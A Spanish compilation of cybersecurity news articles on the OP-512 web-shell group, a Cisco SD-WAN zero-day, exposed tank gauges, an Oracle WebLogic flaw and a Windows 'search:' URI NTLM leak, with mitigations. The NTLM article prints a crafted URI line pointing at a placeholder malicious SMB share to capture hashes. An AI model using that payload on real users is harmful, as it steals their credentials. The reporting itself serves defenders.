Esta técnica consiste en manipular deliberadamente las marcas temporales de archivos maliciosos para que parezcan legítimos o antiguos.

Según ReliaQuest, los web shells escanean automáticamente los directorios donde son instalados y calculan el promedio de las fechas de modificación de archivos cercanos. Posteriormente, modifican sus propios registros de creación y modificación para coincidir con esos valores.

Como resultado, los archivos maliciosos aparentan haber estado presentes en el sistema durante largos períodos de tiempo, dificultando enormemente las investigaciones de respuesta a incidentes y el análisis cronológico de la intrusión.

Esta capacidad representa una evolución significativa frente a los web shells tradicionales utilizados por otros grupos de amenazas.

Cómo opera OP-512 dentro de las redes comprometidas

El incidente analizado por ReliaQuest involucró un servidor heredado Microsoft IIS ejecutando Windows Server 2016 junto con una versión obsoleta de .NET Framework 4.0 que ya había alcanzado el final de su ciclo de vida.

Los investigadores descubrieron evidencia de actividad sospechosa aproximadamente 75 días antes del incidente principal.

Durante esa fase inicial se observaron consultas DNS hacia un dominio controlado por los atacantes identificado como:

ashx.lhlsjcb[.]com

Posteriormente, semanas después, los operadores lanzaron una fase más agresiva descrita por los investigadores como un "sprint operativo".

Durante esta etapa, los atacantes aprovecharon el proceso legítimo del servidor web w3wp.exe para desplegar uno de sus web shells dentro del directorio de carga de archivos de la aplicación comprometida.

Una vez instalado, el framework activó automáticamente su mecanismo de notificación utilizando consultas DNS o solicitudes HTTP como canal alternativo para informar a la infraestructura de mando y control sobre la ubicación exacta del nuevo punto de acceso.

Gracias a este proceso automatizado, los operadores pueden identificar rápidamente sistemas comprometidos y gestionar operaciones de espionaje a gran escala sin intervención manual constante.

Escalada de privilegios hasta SYSTEM

Tras obtener acceso inicial mediante los web shells, OP-512 intentó elevar privilegios utilizando herramientas ampliamente conocidas dentro de la comunidad ofensiva, entre ellas Potato Suite.

Esta colección de técnicas permite aprovechar configuraciones específicas de Windows para obtener privilegios elevados y alcanzar el nivel SYSTEM, el más alto dentro del sistema operativo.

Los investigadores observaron posteriormente la ejecución de comandos como:

whoami /priv

El objetivo de esta acción era verificar que la escalada de privilegios se hubiera completado con éxito y confirmar el acceso total al sistema comprometido.

Una vez obtenido este nivel de control, los atacantes pueden moverse lateralmente, acceder a información sensible, instalar herramientas adicionales o mantener persistencia a largo plazo dentro de la infraestructura objetivo.

¿Por qué OP-512 representa una amenaza diferente?

Según ReliaQuest, la principal preocupación no radica únicamente en la actividad de espionaje, sino en la sofisticación técnica del framework desarrollado por este grupo.

Mientras otros actores reutilizan herramientas públicas o malware previamente identificado, OP-512 utiliza capacidades creadas específicamente para evitar los mecanismos de detección desarrollados contra grupos chinos ya conocidos.

Esta estrategia reduce significativamente la efectividad de las soluciones tradicionales de seguridad y aumenta las probabilidades de permanecer ocultos durante largos períodos.

Los investigadores también destacan que la ausencia de solapamientos directos con otros grupos podría indicar dos escenarios: que OP-512 sea una evolución completa de un actor previamente conocido o que se trate de una operación independiente desarrollada desde cero.

En cualquier caso, el grupo demuestra capacidades avanzadas de desarrollo, evasión y gestión de infraestructura maliciosa.

Los servidores IIS antiguos continúan siendo un objetivo prioritario

El descubrimiento de OP-512 confirma una tendencia creciente dentro del panorama global de amenazas: los servidores IIS expuestos a Internet y ejecutando software heredado siguen siendo uno de los vectores de acceso preferidos por los grupos de espionaje vinculados a China.

La combinación de sistemas desactualizados, aplicaciones sin soporte y configuraciones inseguras continúa ofreciendo oportunidades valiosas para actores avanzados que buscan infiltrarse en organizaciones gubernamentales, empresas estratégicas e infraestructuras críticas.

Para los equipos de seguridad, este hallazgo subraya la necesidad de reforzar la protección de servidores IIS, implementar programas continuos de gestión de vulnerabilidades, actualizar plataformas obsoletas y mejorar las capacidades de detección frente a amenazas que utilizan herramientas personalizadas.

La aparición de OP-512 demuestra que los grupos de ciberespionaje continúan evolucionando rápidamente y desarrollando nuevas técnicas para eludir las defensas tradicionales, convirtiendo la protección de servidores web empresariales en una prioridad crítica para las organizaciones de todo el mundo.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Cisco ha emitido una alerta de seguridad urgente tras confirmar la explotación activa de una vulnerabilidad zero-day de alta gravedad en Cisco Catalyst SD-WAN Manager, identificada como CVE-2026-20245. El fallo permite a atacantes con acceso limitado escalar privilegios hasta obtener control total del sistema como usuario root, representando una amenaza significativa para organizaciones que utilizan esta plataforma para gestionar infraestructuras de red empresariales.

La compañía confirmó que la vulnerabilidad está siendo explotada en ataques reales y que, por el momento, no existen parches de seguridad disponibles para corregir el problema. La situación ha generado preocupación entre administradores y equipos de seguridad debido al amplio uso de Cisco Catalyst SD-WAN en entornos corporativos, gubernamentales y de infraestructuras críticas.

¿Qué es la vulnerabilidad CVE-2026-20245?

La vulnerabilidad CVE-2026-20245 afecta al software Cisco Catalyst SD-WAN Manager, anteriormente conocido como SD-WAN vManage. Esta plataforma permite a las organizaciones supervisar, administrar y automatizar miles de dispositivos SD-WAN desde una consola centralizada.

Según Cisco, el fallo se origina por una validación insuficiente de entradas suministradas por los usuarios, lo que permite la ejecución de comandos arbitrarios en el sistema operativo subyacente.

Un atacante con privilegios limitados podría aprovechar esta debilidad cargando un archivo especialmente diseñado en el sistema vulnerable. Si la explotación tiene éxito, el atacante puede ejecutar comandos con privilegios elevados y obtener acceso root completo al dispositivo afectado.

La empresa explicó que el problema puede derivar en ataques de inyección de comandos, comprometiendo la integridad, confidencialidad y disponibilidad de los sistemas administrados mediante la plataforma.

Todos los modelos de despliegue están afectados

Uno de los aspectos más preocupantes de esta vulnerabilidad es que afecta a todos los modelos de implementación de Cisco Catalyst SD-WAN Manager, incluyendo:

• Despliegues On-Premises (locales).
• Cisco SD-WAN Cloud-Pro.
• Cisco SD-WAN Cloud administrado por Cisco.
• Cisco SD-WAN para entornos gubernamentales FedRAMP.

Esto significa que organizaciones de múltiples sectores podrían verse expuestas independientemente del tipo de infraestructura utilizada.

Cisco Catalyst SD-WAN Manager es ampliamente utilizado para administrar redes distribuidas de gran escala y puede gestionar hasta 6.000 dispositivos SD-WAN desde una única interfaz centralizada. Debido a esta capacidad, un compromiso exitoso podría otorgar a los atacantes acceso a componentes críticos de la infraestructura corporativa.

Requisitos para explotar el fallo

Cisco indicó que la explotación de CVE-2026-20245 requiere que el atacante disponga previamente de privilegios de nivel netadmin en el sistema afectado.

Para conseguir dicho acceso, los atacantes podrían utilizar credenciales válidas comprometidas o explotar otras vulnerabilidades previamente identificadas en la plataforma.

Entre ellas destacan:

• CVE-2026-20182, una vulnerabilidad crítica de evasión de autenticación.
• CVE-2026-20127, otro fallo crítico explotado activamente en ataques zero-day.

Según Cisco, hasta el momento no existen evidencias de métodos alternativos de explotación fuera de estos escenarios conocidos.

No obstante, la compañía reconoció haber observado casos reales donde la explotación de la vulnerabilidad provocó modificaciones de configuración que posteriormente fueron propagadas a dispositivos SD-WAN de borde, aumentando el impacto potencial del ataque.

Mandiant detectó la explotación activa

El descubrimiento de la actividad maliciosa fue reportado a Cisco por Mandiant, la división de ciberseguridad de Google Cloud especializada en respuesta a incidentes y amenazas avanzadas.

Aunque Mandiant no publicó detalles técnicos completos sobre la campaña observada, la información compartida fue suficiente para que el Equipo de Respuesta a Incidentes de Seguridad de Producto (PSIRT) de Cisco iniciara una investigación.

Como parte de las medidas de respuesta, Cisco publicó indicadores de compromiso (IOCs) que permiten a los administradores identificar posibles intentos de explotación.

Uno de los principales indicadores consiste en revisar el archivo:

/var/log/scripts.log

Los administradores deben buscar registros relacionados con cargas sospechosas de archivos de configuración destinadas a controladores vSmart, especialmente aquellas que incluyan comandos utilizados para manipular listas de inquilinos o ejecutar scripts inesperados.

La presencia de este tipo de eventos podría indicar que un atacante intentó aprovechar la vulnerabilidad para escalar privilegios dentro del entorno SD-WAN.

Cisco recomienda revisar los sistemas inmediatamente

Debido a la ausencia de parches de seguridad, Cisco recomienda a los administradores realizar revisiones exhaustivas de sus entornos.

La compañía aconseja recopilar archivos administrativos y técnicos antes de abrir un caso de soporte con Cisco TAC, permitiendo a los especialistas analizar posibles señales de compromiso.

Asimismo, resulta fundamental monitorear actividades inusuales relacionadas con:

• Cargas de archivos no autorizadas.
• Cambios inesperados en configuraciones SD-WAN.
• Creación de nuevas cuentas administrativas.
• Modificaciones en controladores vSmart.
• Actividad sospechosa en registros del sistema.

La detección temprana puede ser clave para evitar que un atacante alcance privilegios root y comprometa dispositivos adicionales dentro de la infraestructura.

Sin parche disponible, pero con medidas de mitigación

Actualmente, Cisco no ha publicado una actualización específica para corregir CVE-2026-20245.

Sin embargo, la empresa recomienda actualizar inmediatamente los sistemas afectados con las versiones corregidas para CVE-2026-20182, una vulnerabilidad crítica que puede ser utilizada como punto de entrada para explotar posteriormente el nuevo zero-day.

Esta recomendación busca reducir las posibilidades de que los atacantes obtengan los privilegios necesarios para desencadenar la explotación completa.

Un historial creciente de vulnerabilidades en Catalyst SD-WAN

La nueva vulnerabilidad se suma a una serie de problemas de seguridad que han afectado a Cisco Catalyst SD-WAN durante los últimos meses.

En febrero, Cisco corrigió CVE-2026-20133, una vulnerabilidad de divulgación de información que posteriormente fue incluida por CISA entre las fallas explotadas activamente.

Poco después, la agencia estadounidense también alertó sobre la explotación de:

• CVE-2026-20128.
• CVE-2026-20122.

Además, en marzo, Cisco solucionó CVE-2026-20127, una vulnerabilidad crítica de evasión de autenticación que, según la compañía, había sido utilizada en ataques de día cero desde al menos 2023.

Las cifras reflejan una tendencia preocupante. Durante los últimos años, CISA ha catalogado aproximadamente 90 vulnerabilidades de Cisco como explotadas activamente en entornos reales. De ellas, cuatro afectaron directamente a Cisco Catalyst SD-WAN Manager y al menos seis fueron utilizadas por grupos de ransomware en campañas dirigidas contra organizaciones empresariales.

Un riesgo creciente para las redes empresariales

La explotación activa de CVE-2026-20245 demuestra que las plataformas de gestión centralizada continúan siendo objetivos prioritarios para los ciberdelincuentes. Un acceso exitoso a Cisco Catalyst SD-WAN Manager puede proporcionar visibilidad y control sobre miles de dispositivos distribuidos en múltiples ubicaciones geográficas.

Mientras Cisco trabaja en una actualización de seguridad definitiva, las organizaciones deben reforzar la monitorización, revisar posibles indicadores de compromiso y aplicar todas las medidas de mitigación disponibles para reducir la superficie de ataque.

La rapidez en la detección y respuesta será esencial para evitar que esta nueva vulnerabilidad zero-day se convierta en una puerta de entrada para compromisos de mayor alcance dentro de redes corporativas críticas.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Las agencias federales de seguridad de Estados Unidos han emitido una advertencia urgente tras descubrir que más de 900 sistemas automáticos de medición de tanques (ATG, por sus siglas en inglés) permanecen expuestos a Internet y están siendo objetivo de ciberataques activos. Estos dispositivos desempeñan un papel fundamental en la supervisión de combustible, productos químicos y otros líquidos almacenados en instalaciones pertenecientes a sectores estratégicos e infraestructuras críticas.

La alerta, publicada conjuntamente por la Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA), el FBI, la Agencia de Seguridad Nacional (NSA), el Departamento de Energía de Estados Unidos y otros organismos gubernamentales, advierte que los atacantes están aprovechando múltiples vulnerabilidades para comprometer estos sistemas y alterar su funcionamiento.

¿Qué son los sistemas ATG y por qué son tan importantes?

Los sistemas de Indicadores Automáticos de Tanques (ATG) son dispositivos electrónicos diseñados para supervisar de forma remota los niveles de líquidos almacenados en depósitos. Su función principal es automatizar el control de inventarios, detectar fugas potencialmente peligrosas y garantizar el cumplimiento de las normativas medioambientales y de seguridad.

Aunque suelen asociarse a estaciones de servicio y gasolineras, los sistemas ATG también son ampliamente utilizados en instalaciones industriales, plantas químicas, centros logísticos y otras infraestructuras críticas donde el monitoreo preciso de sustancias almacenadas es esencial para la continuidad operativa.

Debido a su relevancia, cualquier manipulación maliciosa de estos dispositivos podría generar consecuencias significativas, incluyendo pérdidas económicas, interrupciones operativas, daños ambientales e incluso riesgos para la seguridad pública.

CISA alerta sobre ataques activos contra sistemas ATG

Según el aviso conjunto emitido por las agencias federales, los actores de amenazas están explotando diversas debilidades de seguridad presentes en estos dispositivos para obtener acceso no autorizado y ejecutar comandos remotos.

Entre las vulnerabilidades identificadas se encuentran:

• Credenciales codificadas de forma predeterminada.
• Mecanismos de autenticación débiles o vulnerables.
• Fallos de evasión de autenticación.
• Vulnerabilidades de inyección SQL.
• Errores de ejecución de comandos del sistema operativo.
• Deficiencias que permiten la escalada de privilegios.

Una vez comprometidos los sistemas, los atacantes pueden modificar configuraciones críticas, alterar parámetros operativos e incluso desactivar mecanismos de alerta diseñados para detectar problemas de seguridad.

Las autoridades estadounidenses señalaron que, hasta el momento, la actividad observada no ha sido atribuida oficialmente a ningún estado-nación ni grupo específico de ciberdelincuentes. Sin embargo, la naturaleza de los ataques demuestra un interés creciente por comprometer tecnologías operativas e infraestructuras industriales conectadas a Internet.

Más de 1.000 dispositivos detectados en línea

Tras la publicación de la advertencia gubernamental, la organización especializada en monitoreo de amenazas Shadowserver realizó un análisis global de exposición de sistemas industriales.

Los resultados revelaron que se identificaron 1.061 direcciones IP asociadas con sistemas ATG accesibles desde Internet. De ellas, 909 se encontraban en Estados Unidos, convirtiendo al país en el principal objetivo potencial para este tipo de amenazas.

Shadowserver indicó que la cifra se obtuvo después de eliminar una gran cantidad de sistemas que aparentemente correspondían a honeypots o entornos de prueba diseñados para detectar actividades maliciosas.

La exposición pública de estos dispositivos representa un riesgo considerable, ya que muchos de ellos pueden ser accesibles directamente desde redes externas sin mecanismos adecuados de protección.

Riesgos de seguridad y posibles consecuencias

La manipulación de sistemas ATG no solo representa una amenaza informática, sino también un riesgo operativo y físico.

Los expertos advierten que un atacante con acceso a estos dispositivos podría:

• Alterar lecturas de niveles de combustible.
• Desactivar alarmas de detección de fugas.
• Manipular configuraciones críticas del sistema.
• Interrumpir procesos industriales.
• Generar errores en los inventarios automatizados.
• Dificultar la detección temprana de incidentes ambientales.

En escenarios más graves, la alteración de estos sistemas podría provocar daños permanentes en equipos industriales o contribuir a incidentes relacionados con derrames de combustible y sustancias químicas peligrosas.

Por esta razón, la protección de los sistemas ATG se ha convertido en una prioridad para los operadores de infraestructuras críticas y organizaciones que dependen de tecnologías industriales conectadas.

Posibles vínculos con grupos de hackers iraníes

La advertencia de CISA llega pocas semanas después de que diversos informes señalaran una posible actividad de grupos de amenazas vinculados a Irán.

Un reportaje publicado por medios estadounidenses indicó que hackers iraníes habrían comprometido sistemas ATG conectados a Internet en varias estaciones de servicio del país. Según la información disponible, los atacantes aprovecharon configuraciones inseguras y contraseñas débiles para acceder a los dispositivos.

Aunque los incidentes reportados no provocaron alteraciones reales en los niveles de combustible, sí permitieron modificar la información mostrada en las pantallas de monitoreo. Este tipo de manipulación genera preocupación debido a que podría dificultar la identificación de fugas o fallos relacionados con la seguridad operativa.

La amenaza cobra aún más relevancia tras otro aviso emitido en abril por agencias federales estadounidenses, el cual vinculó a actores respaldados por el Estado iraní con ataques dirigidos contra controladores lógicos programables (PLC) de Rockwell Automation y Allen-Bradley. Dichas operaciones provocaron interrupciones operativas y pérdidas económicas en diversas organizaciones afectadas.

Recomendaciones para proteger los sistemas ATG

Ante el incremento de los ataques, CISA recomienda a las organizaciones adoptar medidas inmediatas para reducir la superficie de exposición y fortalecer la seguridad de sus sistemas.

Entre las acciones prioritarias destacan:

Restringir el acceso desde Internet

Los sistemas ATG no deberían estar expuestos directamente a redes públicas. El acceso remoto debe realizarse únicamente mediante VPN seguras, firewalls y listas de control de acceso.

Cambiar credenciales predeterminadas

Las contraseñas por defecto continúan siendo una de las principales causas de compromiso. Es fundamental utilizar credenciales únicas y robustas.

Aplicar actualizaciones de seguridad

Los fabricantes publican periódicamente parches destinados a corregir vulnerabilidades críticas. Mantener los dispositivos actualizados reduce significativamente el riesgo de explotación.

Implementar autenticación multifactor

Siempre que sea posible, se recomienda habilitar mecanismos de autenticación multifactor para impedir accesos no autorizados.

Supervisar cambios sospechosos

Las organizaciones deben monitorizar constantemente las configuraciones de los sistemas para detectar modificaciones no autorizadas o comportamientos anómalos.

Una amenaza creciente para la seguridad industrial

La exposición de más de 900 sistemas ATG en Estados Unidos pone de manifiesto los desafíos actuales en materia de ciberseguridad industrial. A medida que las infraestructuras críticas adoptan tecnologías conectadas para optimizar operaciones y mejorar la eficiencia, también aumenta la superficie de ataque disponible para ciberdelincuentes y actores patrocinados por estados.

Las recientes advertencias de CISA, FBI y otras agencias federales evidencian que los sistemas de control industrial continúan siendo un objetivo prioritario para los atacantes. La implementación de medidas de seguridad robustas, junto con una adecuada gestión de vulnerabilidades, será clave para proteger estos entornos frente a amenazas cada vez más sofisticadas y persistentes.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La Agencia de Ciberseguridad y Seguridad de Infraestructuras de Estados Unidos (CISA) ha emitido una nueva alerta de seguridad tras incorporar una vulnerabilidad de alta gravedad que afecta a Oracle WebLogic Server a su Catálogo de Vulnerabilidades Explotadas Conocidas (Known Exploited Vulnerabilities Catalog o KEV). La inclusión de esta falla confirma que está siendo utilizada activamente por actores maliciosos en ataques reales, lo que incrementa significativamente el riesgo para organizaciones que aún no han aplicado las actualizaciones de seguridad correspondientes.

La vulnerabilidad, identificada como CVE-2024-21182, posee una puntuación CVSS de 7.5 y permite que atacantes remotos no autenticados comprometan servidores vulnerables a través de protocolos de comunicación específicos utilizados por Oracle WebLogic. Aunque Oracle publicó los parches de seguridad en julio de 2024, la reciente confirmación de explotación activa por parte de CISA demuestra que numerosos sistemas continúan expuestos.

La advertencia refuerza una tendencia que los expertos en ciberseguridad vienen observando desde hace años: Oracle WebLogic sigue siendo uno de los objetivos favoritos de los ciberdelincuentes debido a su amplia adopción en entornos empresariales y gubernamentales.

¿Qué es CVE-2024-21182 y por qué representa una amenaza importante?

La vulnerabilidad CVE-2024-21182 afecta a Oracle WebLogic Server, una de las plataformas de aplicaciones empresariales más utilizadas para desplegar servicios críticos en organizaciones de todo el mundo.

Según la información publicada por CISA, la falla puede ser explotada por un atacante remoto sin necesidad de autenticación previa siempre que tenga acceso a la red y pueda comunicarse con el servidor mediante los protocolos T3 o IIOP.

El problema permite comprometer la integridad y confidencialidad del sistema afectado, pudiendo derivar en:

• Acceso no autorizado a información sensible.
• Exposición de datos críticos de negocio.
• Manipulación de aplicaciones empresariales.
• Compromiso completo del servidor.
• Movimiento lateral dentro de la infraestructura corporativa.
• Escalada de privilegios en entornos conectados.

CISA advirtió que un ataque exitoso puede otorgar acceso total a todos los datos accesibles por Oracle WebLogic Server, una situación especialmente preocupante para organizaciones que gestionan información financiera, sanitaria, gubernamental o estratégica.

¿Cómo están explotando los atacantes esta vulnerabilidad?

Por el momento, las autoridades no han revelado detalles técnicos específicos sobre las campañas de explotación observadas en la naturaleza.

Tampoco se han publicado indicadores de compromiso ni herramientas utilizadas por los atacantes para explotar CVE-2024-21182.

Sin embargo, la inclusión de la vulnerabilidad en el catálogo KEV implica que existen evidencias verificadas de explotación activa, lo que significa que actores maliciosos ya están aprovechando el fallo para comprometer sistemas vulnerables.

La ausencia de información pública sobre la cadena de explotación suele responder a razones defensivas, ya que divulgar detalles técnicos completos podría facilitar ataques adicionales contra organizaciones que aún no han aplicado los parches correspondientes.

Oracle WebLogic: un objetivo recurrente para ciberdelincuentes

La explotación de vulnerabilidades en Oracle WebLogic no es un fenómeno nuevo.

Durante los últimos años, múltiples grupos de amenazas, operadores de ransomware y botnets han utilizado vulnerabilidades presentes en esta plataforma para obtener acceso inicial a redes corporativas.

Los investigadores de seguridad han documentado repetidamente campañas que aprovechan fallos de WebLogic para:

Desplegar ransomware

Los servidores comprometidos pueden utilizarse como punto de entrada para cifrar sistemas corporativos y exigir pagos millonarios a las víctimas.

Minería ilegal de criptomonedas

Los atacantes suelen instalar software de cryptojacking para utilizar los recursos de procesamiento del servidor comprometido.

Reclutamiento para botnets

Los sistemas vulnerables pueden convertirse en nodos de redes maliciosas utilizadas para ataques DDoS, distribución de malware o campañas de spam.

Robo de información corporativa

Los atacantes pueden acceder a bases de datos, credenciales, documentos internos y otra información confidencial.

Debido a estas capacidades, WebLogic continúa siendo uno de los servicios empresariales más vigilados por grupos de ciberdelincuencia avanzada.

La rápida explotación de nuevas vulnerabilidades preocupa a los expertos

La advertencia de CISA se produce pocos meses después de que investigadores de seguridad observaran intentos de explotación automatizada contra otra vulnerabilidad crítica de Oracle WebLogic.

A principios de marzo de 2026, expertos de CloudSEK informaron sobre actividades maliciosas dirigidas a CVE-2026-21962, una vulnerabilidad con puntuación CVSS máxima de 10.0.

Según los investigadores, los intentos de explotación comenzaron poco tiempo después de que se hiciera público un código de prueba de concepto (PoC), demostrando la rapidez con la que los actores maliciosos integran nuevas vulnerabilidades en sus arsenales de ataque.

Este comportamiento confirma una realidad cada vez más frecuente en el panorama de amenazas actual: el tiempo disponible para aplicar parches se reduce drásticamente una vez que una vulnerabilidad se hace pública.

Impacto potencial para organizaciones y organismos gubernamentales

La explotación de CVE-2024-21182 podría tener consecuencias significativas para organizaciones que dependen de Oracle WebLogic para ejecutar aplicaciones críticas.

Entre los posibles escenarios de riesgo se encuentran:

Interrupción de operaciones

Los atacantes podrían afectar servicios empresariales esenciales y provocar tiempos de inactividad prolongados.

Filtración de datos sensibles

La información almacenada o procesada por aplicaciones WebLogic podría quedar expuesta.

Compromiso de infraestructuras críticas

Entidades gubernamentales y organizaciones estratégicas podrían sufrir accesos no autorizados a sistemas clave.

Propagación de ataques

Una vez comprometido un servidor, los atacantes pueden utilizarlo para expandirse a otros sistemas de la red.

En sectores altamente regulados, este tipo de incidentes también puede derivar en sanciones legales, incumplimientos normativos y daños reputacionales considerables.

CISA establece una fecha límite para aplicar los parches

Como parte de la Directiva Operacional Vinculante (BOD 22-01), CISA ha ordenado a las agencias pertenecientes al Poder Ejecutivo Civil Federal de Estados Unidos (FCEB) aplicar las actualizaciones necesarias antes del 4 de junio de 2026.

El objetivo es reducir la superficie de exposición frente a ataques activos que ya están aprovechando esta vulnerabilidad.

Aunque la directiva se aplica específicamente a organismos federales estadounidenses, los expertos recomiendan que todas las organizaciones que utilicen Oracle WebLogic adopten medidas similares de manera inmediata.

Recomendaciones de seguridad para administradores

Las organizaciones que ejecutan Oracle WebLogic Server deberían implementar las siguientes acciones prioritarias:

• Verificar inmediatamente la versión instalada del servidor.
• Aplicar los parches de seguridad publicados por Oracle en julio de 2024.
• Revisar registros de actividad en busca de accesos sospechosos.
• Monitorizar conexiones a través de protocolos T3 e IIOP.
• Implementar segmentación de red para limitar movimientos laterales.
• Aplicar controles de acceso estrictos sobre servidores críticos.
• Utilizar soluciones EDR y monitoreo continuo para detectar comportamientos anómalos.

Además, se recomienda realizar evaluaciones de vulnerabilidades periódicas para identificar sistemas expuestos antes de que puedan ser comprometidos.

La explotación activa convierte a CVE-2024-21182 en una prioridad crítica

La incorporación de CVE-2024-21182 al Catálogo de Vulnerabilidades Explotadas Conocidas de CISA es una señal clara de que la amenaza es real y está afectando activamente a organizaciones en entornos productivos.

Aunque el fallo fue corregido hace casi dos años, la persistencia de sistemas sin actualizar continúa ofreciendo oportunidades valiosas para ciberdelincuentes que buscan acceso inicial a infraestructuras corporativas.

Ante este escenario, la aplicación inmediata de los parches de Oracle, junto con una estrategia sólida de gestión de vulnerabilidades, resulta esencial para reducir el riesgo de compromiso y proteger activos críticos frente a ataques cada vez más sofisticados.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Investigadores en ciberseguridad han revelado una nueva vulnerabilidad sin parchear en Windows que podría ser utilizada por ciberdelincuentes para obtener hashes NTLMv2 de usuarios legítimos, abriendo la puerta a ataques de retransmisión, movimientos laterales y posibles compromisos de red.

El hallazgo, divulgado por los expertos de Huntress, afecta al manejador de URI "search:" de Windows y comparte importantes similitudes con una vulnerabilidad corregida recientemente por Microsoft, identificada como CVE-2026-33829. Aunque el fabricante fue informado de manera responsable sobre el problema, la compañía decidió no emitir una actualización de seguridad debido a que considera que el fallo no alcanza el umbral requerido para una corrección prioritaria.

La revelación ha generado preocupación entre profesionales de seguridad y administradores de sistemas, ya que el fallo puede ser explotado mediante técnicas relativamente sencillas para provocar que un sistema Windows revele credenciales de autenticación NTLMv2 a servidores controlados por atacantes.

¿Qué es NTLMv2 y por qué sigue siendo un objetivo atractivo?

NTLM (New Technology LAN Manager) es un protocolo de autenticación desarrollado por Microsoft que continúa presente en numerosos entornos empresariales, especialmente en infraestructuras heredadas y redes híbridas.

Aunque tecnologías más modernas como Kerberos han reemplazado gran parte de su funcionalidad, NTLM sigue siendo ampliamente utilizado para la autenticación de usuarios, el acceso a recursos compartidos y determinados servicios internos de Windows.

Cuando un sistema intenta autenticarse utilizando NTLMv2, genera un hash criptográfico que, si bien no contiene directamente la contraseña del usuario, puede ser aprovechado por atacantes para realizar diferentes tipos de ataques.

Entre ellos destacan:

• Ataques de retransmisión NTLM.
• Movimiento lateral dentro de la red.
• Acceso no autorizado a recursos corporativos.
• Escalada de privilegios.
• Reconocimiento avanzado de infraestructura.

Por este motivo, cualquier vulnerabilidad capaz de exponer hashes NTLMv2 representa una amenaza significativa para la seguridad empresarial.

Cómo funciona la nueva vulnerabilidad descubierta por Huntress

Según explicó Andrew Schwartz, investigador de Huntress, el problema reside en el manejador URI "search:" integrado en Windows.

La vulnerabilidad permite que un atacante cree enlaces especialmente manipulados capaces de inducir al sistema operativo a conectarse automáticamente a un recurso SMB remoto controlado por el atacante.

El comando utilizado para explotar esta debilidad tiene la siguiente estructura:

search=test&crumb=location:\servidor_malicioso\share

Cuando la víctima interactúa con el enlace, Windows intenta acceder a la ubicación especificada utilizando una ruta UNC (Universal Naming Convention).

Durante este proceso, el sistema inicia automáticamente un procedimiento de autenticación NTLM para intentar conectarse al recurso remoto.

Como consecuencia, el hash Net-NTLMv2 del usuario es enviado al servidor controlado por el atacante, quien puede capturarlo para posteriores acciones maliciosas.

Similitudes con CVE-2026-33829

Los investigadores señalaron que este nuevo problema comparte numerosas características con la vulnerabilidad CVE-2026-33829, corregida por Microsoft en abril de 2026.

Aquella vulnerabilidad afectaba al manejador URI utilizado por la Herramienta de Recorte de Windows (Snipping Tool), específicamente a través del parámetro "filePath".

El fallo permitía que la aplicación accediera a rutas UNC arbitrarias sin realizar una validación adecuada, provocando exactamente el mismo resultado: la filtración de hashes Net-NTLMv2 mediante conexiones SMB controladas por atacantes.

En ambos casos se observan características prácticamente idénticas:

• Exposición de hashes NTLMv2.
• Requerimiento de interacción del usuario.
• Uso de rutas UNC remotas.
• Posibilidad de ataques de retransmisión.
• Clasificación de gravedad moderada.

Sin embargo, mientras Microsoft corrigió CVE-2026-33829, decidió no actuar sobre esta nueva variante.

Un problema que recuerda a vulnerabilidades anteriores

Aunque la vulnerabilidad ha ganado notoriedad recientemente, el uso del parámetro "crumb" para provocar fugas de credenciales no es completamente nuevo.

Los investigadores recordaron que una técnica similar ya había sido documentada anteriormente en la vulnerabilidad CVE-2023-35636, analizada por expertos de seguridad en 2024.

Esto demuestra que los manejadores URI continúan representando una superficie de ataque relevante dentro del ecosistema Windows, especialmente cuando interactúan con protocolos heredados como SMB y NTLM.

La persistencia de este tipo de escenarios evidencia las dificultades que enfrentan los fabricantes para eliminar por completo riesgos asociados a componentes históricos que aún forman parte de millones de sistemas empresariales.

Riesgos para organizaciones y entornos corporativos

La filtración de hashes NTLMv2 puede parecer un problema menor a primera vista, pero en realidad puede tener consecuencias significativas para la seguridad de una organización.

Una vez capturado el hash, un atacante puede utilizar herramientas especializadas para ejecutar ataques de retransmisión NTLM contra otros sistemas dentro de la red.

En entornos mal segmentados, esto puede facilitar:

Acceso a recursos internos

Los atacantes pueden autenticarse frente a servicios que acepten conexiones NTLM.

Movimiento lateral

La obtención de credenciales válidas facilita el desplazamiento entre diferentes sistemas de la infraestructura.

Escalada de privilegios

En determinadas circunstancias, los atacantes podrían aprovechar configuraciones inseguras para obtener permisos elevados.

Compromiso de servicios críticos

Controladores de dominio, servidores de archivos y aplicaciones empresariales podrían convertirse en objetivos posteriores.

Por esta razón, incluso vulnerabilidades clasificadas como moderadas pueden representar un riesgo considerable cuando son utilizadas como parte de cadenas de ataque más complejas.

Microsoft rechaza emitir un parche

Tras recibir la divulgación responsable el 15 de abril de 2026, Microsoft analizó el problema y decidió no desarrollar una corrección.

Según la respuesta proporcionada a los investigadores, la compañía indicó que únicamente los casos catalogados como de gravedad Importante o Crítica cumplen actualmente los criterios necesarios para recibir mantenimiento de seguridad dentro de su programa de respuesta.

Esta decisión ha generado debate entre profesionales del sector, quienes consideran que las fugas de hashes NTLM continúan siendo una amenaza relevante en redes empresariales modernas.

Medidas de mitigación recomendadas

Ante la ausencia de una solución oficial, los especialistas recomiendan adoptar varias medidas defensivas para reducir significativamente la superficie de ataque.

Bloquear SMB saliente

Las organizaciones deberían restringir el tráfico SMB saliente a través de los puertos TCP 445 y TCP 139 en aquellos equipos que no requieran este tipo de conexiones.

Habilitar la firma SMB

La firma SMB dificulta considerablemente los ataques de retransmisión al garantizar la integridad de las comunicaciones.

Desactivar NTLM cuando sea posible

Microsoft lleva años recomendando la transición hacia mecanismos de autenticación más seguros como Kerberos.

Implementar segmentación de red

Una adecuada segmentación limita el impacto potencial de cualquier credencial comprometida.

Capacitar a los usuarios

La mayoría de los escenarios de explotación requieren que la víctima interactúe con enlaces maliciosos, por lo que la concienciación sigue siendo una medida fundamental.

Un nuevo recordatorio de los riesgos asociados a NTLM

La nueva vulnerabilidad descubierta en el manejador URI "search:" de Windows pone de manifiesto que NTLM continúa siendo una superficie de ataque relevante dentro de los entornos corporativos modernos.

Aunque Microsoft considera que el problema no justifica una actualización de seguridad, la posibilidad de capturar hashes NTLMv2 y utilizarlos en ataques posteriores representa un riesgo que las organizaciones no deben ignorar.

